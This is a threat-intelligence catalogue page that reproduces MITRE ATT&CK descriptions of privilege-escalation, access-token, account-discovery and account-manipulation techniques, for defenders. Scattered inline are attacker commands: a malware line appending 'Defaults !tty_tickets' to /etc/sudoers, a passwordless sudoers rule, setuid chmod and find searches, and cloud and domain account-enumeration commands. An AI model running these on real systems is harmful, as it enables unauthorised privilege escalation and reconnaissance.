Skip to content

Hide Navigation Hide TOC

Edit

Tidal Technique

Tidal Technique Cluster

Authors
Authors and/or Contributors
Tidal Cyber

Bypass User Account Control

Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.[TechNet How UAC Works]

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box.[TechNet Inside UAC][MSDN COM Elevation] An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[Davidson Windows]

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods[Github UACMe] that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.[SANS UAC Bypass]

Internal MISP references

UUID 5e1499a1-f1ad-4929-84e1-5d33c371c02d which can be used as unique global reference for Bypass User Account Control in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.002
Related clusters

To see the related clusters, click here.

Elevated Execution with Prompt

Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.[AppleDocs AuthorizationExecuteWithPrivileges] The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.

Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.[Death by 1000 installers; it's all broken!][Carbon Black Shlayer Feb 2019][OSX Coldroot RAT] This technique may be combined with Masquerading to trick the user into granting escalated privileges to malicious code.[Death by 1000 installers; it's all broken!][Carbon Black Shlayer Feb 2019] This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.[Death by 1000 installers; it's all broken!]

Internal MISP references

UUID fd6b86c5-535b-4532-a6d8-a57a6fb04c18 which can be used as unique global reference for Elevated Execution with Prompt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.004
Related clusters

To see the related clusters, click here.

Setuid and Setgid

An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.[setuid man page] Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.

Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. Linux and Mac File and Directory Permissions Modification). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used.

Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.[OSX Keydnap malware] This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.

Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. File and Directory Discovery). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.[GTFOBins Suid]

Internal MISP references

UUID e939bc27-a2cc-4278-be9b-a794c34aacbc which can be used as unique global reference for Setuid and Setgid in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.001
Related clusters

To see the related clusters, click here.

Sudo and Sudo Caching

Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.

Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."[sudo man page 2018] Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.[OSX.Dok Malware] Elevated privileges are required to edit this file though.

Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.

In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers.[cybereason osx proton] In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.

Internal MISP references

UUID e082687f-d403-4246-987b-ad5f12911e4b which can be used as unique global reference for Sudo and Sudo Caching in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.003
Related clusters

To see the related clusters, click here.

Temporary Elevated Cloud Access

Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.

Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.[Google Cloud Just in Time Access 2023][Azure Just in Time Access 2023]

Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the iam.serviceAccountTokenCreator role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.[Google Cloud Service Account Authentication Roles] In Exchange Online, the ApplicationImpersonation role allows a service account to use the permissions associated with specified user accounts.[Microsoft Impersonation and EWS in Exchange]

Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the PassRole permission can allow a service they create to assume a given role, while in GCP, users with the iam.serviceAccountUser role can attach a service account to a resource.[AWS PassRole][Google Cloud Service Account Authentication Roles]

While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.[Rhino Google Cloud Privilege Escalation][Rhino Security Labs AWS Privilege Escalation]

Note: this technique is distinct from Additional Cloud Roles, which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control Additional Cloud Roles that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.[CrowdStrike StellarParticle January 2022]

Internal MISP references

UUID 448dc009-2d3f-5480-aba3-0d80dc4336cd which can be used as unique global reference for Temporary Elevated Cloud Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1548.005
Related clusters

To see the related clusters, click here.

Abuse Elevation Control Mechanism

Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

Internal MISP references

UUID ac7d9875-d18b-48f6-93e6-47c565f9526b which can be used as unique global reference for Abuse Elevation Control Mechanism in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Create Process with Token

Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.[Microsoft RunAs]

Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via Token Impersonation/Theft or created via Make and Impersonate Token before being used to create a process.

While this technique is distinct from Token Impersonation/Theft, the techniques can be used in conjunction where a token is duplicated and then used to create a new process.

Internal MISP references

UUID ef0e0599-6543-499d-8409-ef449da5c38a which can be used as unique global reference for Create Process with Token in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.002
Related clusters

To see the related clusters, click here.

Make and Impersonate Token

Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.

This behavior is distinct from Token Impersonation/Theft in that this refers to creating a new user token instead of stealing or duplicating an existing one.

Internal MISP references

UUID 561da0ae-4ebc-4356-a954-338249cac31a which can be used as unique global reference for Make and Impersonate Token in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.003
Related clusters

To see the related clusters, click here.

Parent PID Spoofing

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.[DidierStevens SelectMyParent Nov 2009] This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.[Microsoft UAC Nov 2018]

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.[CounterCept PPID Spoofing Dec 2018] This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.[CTD PPID Spoofing Macro Mar 2019][CounterCept PPID Spoofing Dec 2018]

Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.[XPNSec PPID Nov 2017]

Internal MISP references

UUID 449abc18-9faf-4ea6-a420-34528c28301d which can be used as unique global reference for Parent PID Spoofing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.004
Related clusters

To see the related clusters, click here.

SID-History Injection

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. [Microsoft SID] An account can hold additional SIDs in the SID-History Active Directory attribute [Microsoft SID-History Attribute], allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values [Microsoft Well Known SIDs Jun 2017] may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, SMB/Windows Admin Shares, or Windows Remote Management.

Internal MISP references

UUID dcb323f0-0fe6-4e26-9039-4f26f10cd3a5 which can be used as unique global reference for SID-History Injection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.005
Related clusters

To see the related clusters, click here.

Token Impersonation/Theft

Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using DuplicateToken or DuplicateTokenEx. The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.

An adversary may perform Token Impersonation/Theft when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally Create Process with Token using CreateProcessWithTokenW or CreateProcessAsUserW. Token Impersonation/Theft is also distinct from Make and Impersonate Token in that it refers to duplicating an existing token, rather than creating a new one.

Internal MISP references

UUID ab823cbf-0238-4347-a191-a90d84b978f7 which can be used as unique global reference for Token Impersonation/Theft in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1134.001
Related clusters

To see the related clusters, click here.

Access Token Manipulation

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.

An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. Token Impersonation/Theft) or used to spawn a new process (i.e. Create Process with Token). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.[Pentestlab Token Manipulation]

Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.

Internal MISP references

UUID 1423e8c1-7cbf-4cfb-a70d-b6fe8e1a8041 which can be used as unique global reference for Access Token Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Account Access Removal

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a System Shutdown/Reboot to set malicious changes into place.[CarbonBlack LockerGoga 2019][Unit42 LockerGoga 2019]

In Windows, Net utility, Set-LocalUser and Set-ADAccountPassword PowerShell cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy.

Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as Data Destruction and Defacement, in order to impede incident response/recovery before completing the Data Encrypted for Impact objective.

Internal MISP references

UUID 847fcc8a-e74d-41e2-9f05-8d79d990cc04 which can be used as unique global reference for Account Access Removal in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Account - Duplicate

Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

With authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.[Microsoft msolrolemember][GitHub Raindance] The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.[Microsoft AZ CLI][Black Hills Red Teaming MS AD Azure, 2018]

The AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.[AWS List Roles][AWS List Users] In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.[Google Cloud - IAM Servie Accounts List API]

Internal MISP references

UUID d76c3dde-dba5-4748-8d51-c93fc34f885e which can be used as unique global reference for Cloud Account - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1087.004
Related clusters

To see the related clusters, click here.

Domain Account - Duplicate

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as net user /domain and net group /domain of the Net utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. PowerShell cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.

Internal MISP references

UUID 12908bde-a5eb-40a5-ae27-d93960d0bfdc which can be used as unique global reference for Domain Account - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1087.002
Related clusters

To see the related clusters, click here.

Email Account

Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).[Microsoft Exchange Address Lists]

In on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.[Microsoft getglobaladdresslist][Black Hills Attacking Exchange MailSniper, 2016]

In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.[Google Workspace Global Access List]

Internal MISP references

UUID b31b014b-0b59-4493-966b-a57ad68f073d which can be used as unique global reference for Email Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1087.003
Related clusters

To see the related clusters, click here.

Local Account - Duplicate

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Commands such as net user and net localgroup of the Net utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.

Internal MISP references

UUID df5f6835-ca0a-4ef5-bb3a-b011e4025545 which can be used as unique global reference for Local Account - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1087.001
Related clusters

To see the related clusters, click here.

Account Discovery

Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts).

Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.

For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default PowerShell and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

Internal MISP references

UUID 6736995e-b9ea-401b-81fa-6caeb7a17ce3 which can be used as unique global reference for Account Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Additional Cloud Credentials

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.[Microsoft SolarWinds Customer Guidance][Blue Cloud of Death][Blue Cloud of Death Video] These credentials include both x509 keys and passwords.[Microsoft SolarWinds Customer Guidance] With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.[Demystifying Azure AD Service Principals]

In infrastructure-as-a-service (IaaS) environments, after gaining access through Cloud Accounts, adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.[GCP SSH Key Add] This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.[Expel IO Evil in AWS][Expel Behind the Scenes]

Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. Cloud Accounts).[Rhino Security Labs AWS Privilege Escalation][Sysdig ScarletEel 2.0] For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.[SpecterOps Azure Privilege Escalation]

In AWS environments, adversaries with the appropriate permissions may also use the sts:GetFederationToken API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. [Crowdstrike AWS User Federation Persistence]

Internal MISP references

UUID 0799f2ee-3a83-452e-9fa9-83e91d83be25 which can be used as unique global reference for Additional Cloud Credentials in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.001
Related clusters

To see the related clusters, click here.

Additional Cloud Roles

An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.[AWS IAM Policies and Permissions][Google Cloud IAM Policies][Microsoft Support O365 Add Another Admin, October 2019][Microsoft O365 Admin Roles] With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).[Expel AWS Attacker] [Microsoft O365 Admin Roles]

This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.[Rhino Security Labs AWS Privilege Escalation]

Internal MISP references

UUID 71867386-ddc2-4cdb-a0c9-7c27172c23c1 which can be used as unique global reference for Additional Cloud Roles in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.003
Related clusters

To see the related clusters, click here.

Additional Container Cluster Roles

An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.[Kubernetes RBAC][Aquasec Kubernetes Attack 2023] Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.[Kuberentes ABAC]

This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised.

Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.[Google Cloud Kubernetes IAM][AWS EKS IAM Roles for Service Accounts][Microsoft Azure Kubernetes Service Service Accounts] In these cases, this technique may be used in conjunction with Additional Cloud Roles.

Internal MISP references

UUID 1169afd3-d80d-5942-b16f-8dc1812ef6bb which can be used as unique global reference for Additional Container Cluster Roles in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.006
Related clusters

To see the related clusters, click here.

Additional Email Delegate Permissions

Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.

For example, the Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.[Microsoft - Add-MailboxPermission][FireEye APT35 2018][Crowdstrike Hiding in Plain Sight 2018] In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.[Gmail Delegation][Google Ensuring Your Information is Safe]

Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.[Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452]

This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add Additional Cloud Roles to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: Internal Spearphishing), so the messages evade spam/phishing detection mechanisms.[Bienstock, D. - Defending O365 - 2019]

Internal MISP references

UUID 15660958-1f4f-4136-8cda-82123fd38232 which can be used as unique global reference for Additional Email Delegate Permissions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.002
Related clusters

To see the related clusters, click here.

Device Registration

Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.

MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.[CISA MFA PrintNightmare][DarkReading FireEye SolarWinds] In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. [Mandiant APT29 Microsoft 365 2022]

Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.[AADInternals - Device Registration][AADInternals - Conditional Access Bypass][Microsoft DEV-0537]

Devices registered in Azure AD may be able to conduct Internal Spearphishing campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.[Microsoft - Device Registration] Additionally, an adversary may be able to perform a Service Exhaustion Flood on an Azure AD tenant by registering a large number of devices.[AADInternals - BPRT]

Internal MISP references

UUID 34ffaa47-f591-4a44-bd7d-9790d81365cd which can be used as unique global reference for Device Registration in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.005
Related clusters

To see the related clusters, click here.

SSH Authorized Keys

Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.[SSH Authorized Keys] Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.

Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.[Google Cloud Add Metadata][Google Cloud Privilege Escalation] Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.[Azure Update Virtual Machines] This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.[Venafi SSH Key Abuse][Cybereason Linux Exim Worm] It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.

SSH keys can also be added to accounts on network devices, such as with the ip ssh pubkey-chain Network Device CLI command.[cisco_ip_ssh_pubkey_ch_cmd]

Internal MISP references

UUID 4659b96f-0e8d-4480-966b-c75062645f14 which can be used as unique global reference for SSH Authorized Keys in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.004
Related clusters

To see the related clusters, click here.

Account Manipulation

Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged Valid Accounts.

Internal MISP references

UUID 65f7482c-485b-4fd7-80f5-0ec6e923ac4d which can be used as unique global reference for Account Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Acquire Access

Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.[Microsoft Ransomware as a Service][CrowdStrike Access Brokers][Krebs Access Brokers Fortune 500] In some cases, adversary groups may form partnerships to share compromised systems with each other.[CISA Karakurt 2022]

Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., Web Shell) or established access via External Remote Services. In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.[Microsoft Ransomware as a Service]

By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.[Microsoft Ransomware as a Service][CrowdStrike Access Brokers]

